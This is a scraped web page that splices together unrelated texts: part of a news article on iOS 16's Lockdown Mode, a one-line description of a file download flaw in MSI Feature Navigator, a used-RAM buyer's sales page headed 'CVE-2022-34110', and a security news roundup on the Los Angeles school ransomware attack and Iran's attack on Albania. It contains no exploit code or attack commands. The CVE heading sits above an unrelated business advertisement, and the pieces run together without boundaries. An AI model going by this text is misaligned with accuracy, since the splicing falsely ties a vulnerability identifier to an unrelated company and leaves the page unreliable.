Lockdown Mode is different in the sense that it is almost a parallel universe that users can move their iPhones into where luxuries like link previews in Messages, shared albums in Photos, and FaceTime calls from phone numbers and accounts you haven't called before are all blocked. In exchange, the goal is to make it much more difficult for commercial spyware vendors to discover and take advantage of complex exploit chains that combine vulnerabilities in multiple iOS features to take control of devices.

“While the vast majority of users will never be the victims of highly targeted cyberattacks, we will work tirelessly to protect the small number of users who are,” Apple’s head of security engineering and architecture, Ivan Krstić, said when the feature was announced in July. “That includes continuing to design defenses specifically for these users.”

Turn on Lockdown Mode in iOS 16 by going to **Settings**, then **Privacy and Security**, then **Lockdown Mode**.

Though Apple doesn't intend either feature to become a hot trend for most users, the fact is that the tools may find audiences and use cases beyond their intended populations. And when it comes to Lockdown Mode, in particular, one can only imagine what strategies researchers and attackers alike may develop to attack even this most hardened version of commercial iOS. But both features offer new and expanded opportunities for users to make it more difficult for adversaries of all sorts to achieve the level of access they seek. And both make it easier for Apple to fix new vulnerabilities and workarounds that arise more easily. Rather than having to make substantial changes, Apple can simply refine Safety Check and Lockdown Mode to address the latest concern.

“There’s been some debate about whether Lockdown Mode will actually prevent spyware attacks like infections from NSO Group's Pegasus,” Malwarebytes Reed says. “It’s possible it won’t prevent all possible means of infection, but it reduces the attack surfaces and makes it harder for attackers. As much as I’d personally like to be able to have greater visibility into iOS, I think Apple’s doing the right thing."

Apple's App Store, though, is one domain that Lockdown Mode and Safety Check don’t address. Researchers have found malicious apps that got approved for the App Store in the past, and as other avenues are closed off to attackers, they may increasingly refine their techniques for developing stealthily malicious apps in an attempt to make up ground. 

“The specific elements of Lockdown Mode give us insight into what Apple sees as the most common attack vectors on an iPhone today,” Corellium's Gorton says. But “Lockdown Mode doesn't seem to restrict access to third-party apps. It's possible that as Apple limits the attack surface for native features, the attack focus may increasingly shift to apps from the App Store. That could be problematic for a couple of reasons. One, we know these these apps undergo relatively limited review before making it to the App Store. And two, this would increase the burden of security mitigations on third-party developers, but the locked-down nature of iOS makes it increasingly difficult for app developers to adequately test the security of their own apps.”

Apple's changing philosophy on specialized security and privacy protections is a welcome step, but it may apply its own evolutionary pressures to the iOS security field that move attackers' focus without dampening their zeal.

iOS 16 Has Two New Security Features for Worst-Case Scenarios

An issue in Micro-Star International MSI Feature Navigator v1.0.1808.0901 allows attackers to download arbitrary files regardless of file type or size.

We buy ram memory of all major brands like Crucial, SanDisk, Kingston, Dell, Apple, HP and other major brands. Branded RAM gives you higher value. If your RAM memory still have sticker on that, then you are at luck, we can provide you better pricing. We accept DDR2 and DDR3 types of RAM Memory. We also accept RAM memory from old Mac computer and laptops. You can sell us RAM in bulk quantity as well. We are buying server RAM memory also. Just fill the form on bottom of this page and we will get back to you as soon as possible.

**Why you choose Microstar?**

*   We are eBay Power Seller.
*   We are in this industry more than 3 decades.
*   We pay you most of your RAM memory.
*   We buy RAM memory from computer, laptop and server of all types.
*   We process your payment fast.

**We accept DDR2 and DDR3 RAM Memory of following brands:**

Oracle-Sun Microsystems

Samsung

Dell

Crucial

Micron

IBM

Hynix

HP

Edge

Corsair

Cisco

All other brands

**Sell Hard Drives, Sell used hard drives for cash**

Convert your excess storage in to cash by selling your old hard disk drives. We buy old used or refurbished hard drives. We accept HDDs and SSDs from computer, laptop, server etc.

Mostly we buy all size 2.5” and 3.5” storage types of hard disk drives and solid state drives. We buy hard disk drives of all major brands like Samsung, GMBT, Western Digital, Dell, IBM, Seagate etc.

**Microstar**

9216 Lazy Lane, Tampa Florida 33614.  
Email: microstar@verizon.net  
Store hours are by appointment only.

**President**

Hello, I am Ray Margarit and I am the President of Microstar. I am probably at the office now. Please call me at: (813) 667-1000.

**Testing**

We have very efficient & strenuous testing methods. We are Department of Defense certified in removing data from hard drives.

We are ALWAYS looking to buy large quantities of used software, used CPU chips, used memory chips, used hard drives, used monitors, used cdroms, used memory ram, used printers, used motherboards, used sdram, used video cards, such brands like; Pentium, AMD, Seagate, Western Digital, Dell, IBM, HP, Intel and others, as well as other computer related items which companies could sell after upgrades. We actually buy and sell all used electronic equipment.

**We are an eBay PowerSeller, See for yourself**

The Microstar Ebay store offers top quality brands in Memory, CPUs, Hard Drives, and other computer components and peripherals. You can sell RAM, Memory, Hard Disks, Processors, Motherboards and other computer scraps in bulk as well. We sell very fast as we are eBay Power Seller.

**Seller Form. We Buy. Sell to us!**

Please type in a description of the items that you would like to sell and the total price for them. If we are interested, we will respond with an e-mail message.

CVE-2022-34110: Sell Memory, Sell RAM, Sell Hard Drives

Plus: Albania cuts ties with Iran, claims of a TikTok data breach that didn’t happen, and much more.

Russia’s full-scale invasion of Ukraine hasn’t gone to Vladimir Putin’s plan: Its troops have suffered devastating losses, failed to capture key Ukrainian cities, and been pushed back toward Russia. However, domestically, the Kremlin has succeeded in further suppressing its citizens—including blocking independent news media and other access to impartial information. Now, a new tool lets people in Russia access websites the Kremlin has blocked, giving them access to news that’s not dictated by the state’s propaganda machine.

The Biden administration is reportedly readying itself to take action against TikTok, following years of suggestions that the Chinese-owned app is a threat to national security. This week we looked at the problem with TikTok: that lawmakers can’t decide on what threat, if any, the app really poses.

Elsewhere, Apple revealed the new iPhone 14. Alongside this, it announced that iOS 16 will be available for people to download from September 12. This means Apple’s new passkey technology, which eliminates the need for passwords, will be available to millions of people. Here’s everything you need to know about Apple’s passkeys.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

With more than 400,000 students ranging from kindergarten to 12th grade, the Los Angeles Unified School District is one of the largest school districts in the US. On September 6, the district became the latest to be targeted by ransomware. In a statement published online, the district’s administrators said it had detected “unusual activity” within its networks, saying it had been targeted by ransomware; despite the attack, students have been able to attend school.

The attack prompted a large response from officials, with the FBI and Department of Homeland Security assisting local law enforcement. Students and staff have lost access to their email systems, local reports say. It is also unclear, according to reports, whether students' information, including disciplinary records and assessments, was accessed by the attackers. The school district says that students and employees must reset their passwords to their school accounts while physically attending school district sites. “The District has staggered password reset access to minimize congestion from simultaneous users accessing the website,” officials said in a statement.

The Vice Society ransomware group has claimed responsibility for the attack. Following the incident, the Cybersecurity and Infrastructure Security Agency (CISA) and other partners published a warning about Vice Society, saying it has been “disproportionately targeting the education sector.” The Los Angeles attack is the latest against educational institutions: According to a report by security firm Sophos based on a survey of 499 respondents, 56 percent of lower education and 64 percent of higher education organizations were hit by ransomware in the past year, a “considerable increase” from the previous year.

Back in July, the government websites of Albania were knocked offline. Last month, security company Mandiant researchers revealed that Iranian hackers, working on behalf of Tehran, were likely to be behind the attacks, which took out public services for hours. “These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance,” John Hultquist, Mandiant’s vice president of intelligence, told WIRED when it published its findings.

This week, the government of Albanian took the unprecedented step to cut diplomatic ties with Iran, accusing it of launching the cyberattack. The country also ordered Iranian embassy staff to leave the country. “The deep investigation put at our disposal undeniable evidence that the cyberattack against our country was orchestrated and sponsored by the Islamic Republic of Iran which had involved four groups for the attack on Albania,” prime minister Edi Rama said in a statement. (Microsoft conducted the investigation for the Albanian government.)

Tag

#apple